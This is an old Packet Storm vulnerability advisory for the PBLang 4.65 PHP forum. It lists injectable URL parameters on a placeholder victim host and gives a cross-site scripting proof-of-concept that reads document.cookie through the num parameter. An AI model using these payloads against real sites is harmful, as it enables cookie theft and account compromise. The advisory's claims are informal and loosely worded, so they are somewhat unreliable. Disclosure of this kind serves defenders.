PBLang465.txt

2005-10-30T00:00:00
ID PACKETSTORM:41050
Type packetstorm
Reporter Abducter
Modified 2005-10-30T00:00:00

Description

                                        
                                            `  
Class: Input Validation Error   
CVE: CVE-MAP-NOMATCH   
Remote: Yes   
Local: Yes   
Credit: Abducter (ABDUCTER_MINDS@YAHOO.COM) Or (ABDUCTER_MINDS76@HOTMAIL.COM)  
Vulnerable: File Including In PBLang 4.65 (ALL VERSION)  
* info *  
PBLang IS POWER PHP SITES SUPPORT HERE  
http://pblang.drmartinus.de/  
  
* expliot *  
http://www.victim.com/profile.php?u=[abducter here]  
http://www.victim.com/pmpshow.php?num=[abducter here]  
http://www.victim.com/delpm.php?id=[abducter here]  
  
u can do xss in any expliot as this   
http://www.victim.com/pmpshow.php?num=<script>JavaScript:alert(document.cookie);</script>  
  
* credit *  
Devil-00  
Security4Arab .. A'Where Home .. WE LOVE S4A FOR EVER :P  
HACKERS PAL ..  
WwW.S4a.Cc  
MY LOVE (N0N0)  
  
`